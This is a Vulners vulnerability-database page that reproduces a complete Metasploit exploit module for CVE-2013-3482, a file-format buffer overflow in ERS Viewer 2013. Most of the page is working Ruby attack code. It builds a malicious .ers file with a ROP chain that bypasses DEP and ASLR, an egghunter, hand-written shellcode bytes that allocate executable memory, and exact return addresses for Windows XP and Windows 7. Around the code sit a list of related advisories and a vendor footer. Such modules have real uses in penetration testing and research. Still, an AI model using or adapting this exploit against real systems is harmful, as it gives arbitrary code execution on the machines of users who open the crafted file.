Vulners
Lucene search
ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | ERS Viewer 2013 ERS File Handling Buffer Overflow | 9 Jul 201300:00 | – | zdt |
 | CVE-2013-3482 | 9 Jul 201300:00 | – | circl |
 | ERS Viewer 2013 ERS File Handling Buffer Overflow (CVE-2013-3482) | 20 Aug 201300:00 | – | checkpoint_advisories |
 | CVE-2013-3482 | 19 Jan 201415:00 | – | cve |
 | CVE-2013-3482 | 19 Jan 201415:00 | – | cvelist |
 | ERS Viewer 2013 ERS File Handling Buffer Overflow | 8 Jul 201314:11 | – | metasploit |
 | CVE-2013-3482 | 19 Jan 201417:16 | – | nvd |
 | ERS Viewer 2013 ERS File Handling Buffer Overflow | 9 Jul 201300:00 | – | packetstorm |
 | Stack overflow | 19 Jan 201417:16 | – | prion |
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info={})
super(update_info(info,
'Name' => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
The vulnerability exists in the module ermapper_u.dll, where the function
rf_report_error handles user provided data in a insecure way. It results in
arbitrary code execution under the context of the user viewing a specially crafted
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions
13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Fitts', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3482' ],
[ 'OSVDB', '93650' ],
[ 'URL', 'http://secunia.com/advisories/53620/' ]
],
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
# Tested on Windows XP SP3
[ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
{
'Offset' => 191,
'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
}
],
# Tested on Windows XP SP3 and Windows 7 SP1
[ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
{
'Offset' => 191,
'Ret' => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll
'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
'VirtualAllocPtr' => 0x1010c0f4
}
]
],
'Privileged' => false,
'DisclosureDate' => "May 23 2013",
'DefaultTarget' => 1))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll]
0x10105d87, # POP EBX # RETN [ermapper_u.dll]
0xffffffff, #
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x30d059d9, # INC EBX # RETN [ethrlib.dll]
0x100e9dd9, # POP EAX # RETN [ermapper_u.dll]
0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx)
0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll]
0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
0x10086d21, # RETN (ROP NOP) [ermapper_u.dll]
0x1001a148, # & push esp # ret [ermapper_u.dll]
0x10082624, # POP EAX # RETN [ermapper_u.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x100f687d, # NEG EAX # RETN [ermapper_u.dll]
0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
0x100288b5, # POP EAX # RETN [ermapper_u.dll]
0x90909090, # nop
0x100e69e0, # PUSHAD # RETN [ermapper_u.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Restore the stack pointer in order to execute the final payload successfully
def fix_stack
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
return pivot
end
# In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
# the payload on memory we can't jump there directly, but allocate executable memory
# and jump there. Badchars: "\x0a\x0d\x00"
def hunter_suffix(payload_length)
# push flProtect (0x40)
suffix = "\xB8\xC0\xFF\xFF\xFF" # mov eax, 0xffffffc0
suffix << "\xF7\xD8" # neg eax
suffix << "\x50" # push eax
# push flAllocationType (0x3000)
suffix << "\x66\x05\xC0\x2F" # add ax, 0x2fc0
suffix << "\x50" # push eax
# push dwSize (0x1000)
suffix << "\x66\x2D\xFF\x1F" # sub ax, 0x1fff
suffix << "\x48" # dec eax
suffix << "\x50" # push eax
# push lpAddress
suffix << "\xB8\x0C\x0C\x0C\x0C" # mov eax, 0x0c0c0c0c
suffix << "\x50" # push eax
# Call VirtualAlloc
suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
# Copy payload (edi) to Allocated memory (eax)
suffix << "\x89\xFE" # mov esi, edi
suffix << "\x89\xC7" # mov edi, eax
suffix << "\x31\xC9" # xor ecx, ecx
suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length
suffix << "\xF3\xA4" # rep movsb
# Jmp to the final payload (eax)
suffix << "\xFF\xE0" # jmp eax
return suffix
end
def exploit
#These badchars do not apply to the final payload
badchars = [0x0c, 0x0d, 0x0a].pack("C*")
eggoptions =
{
:checksum => true,
:eggtag => 'w00t'
}
my_payload = fix_stack + payload.encoded
if target.name =~ /DEP & ASLR bypass/
# The payload length can't include NULL's in order to
# build the stub which will copy the final payload to
# executable memory
while [my_payload.length].pack("v").include?("\x00")
my_payload << rand_text(1)
end
end
hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)
if target.name =~ /DEP & ASLR bypass/
hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
end
if target.name =~ /NO DEP/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # jmp eax
buf << rand_text_alpha(8)
buf << egg
elsif target.name =~ /DEP & ASLR bypass/
buf = rand_text_alpha(1)
buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
buf << create_rop_chain
buf << hunter
buf << rand_text_alpha(target['Offset'] - buf.length)
buf << [target.ret].pack("V") # xchg eax, esp # ret
buf << rand_text_alpha(8)
buf << egg
end
ers = %Q|
DatasetHeader Begin
#{buf} End
|
file_create(ers)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jul 2013 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.66743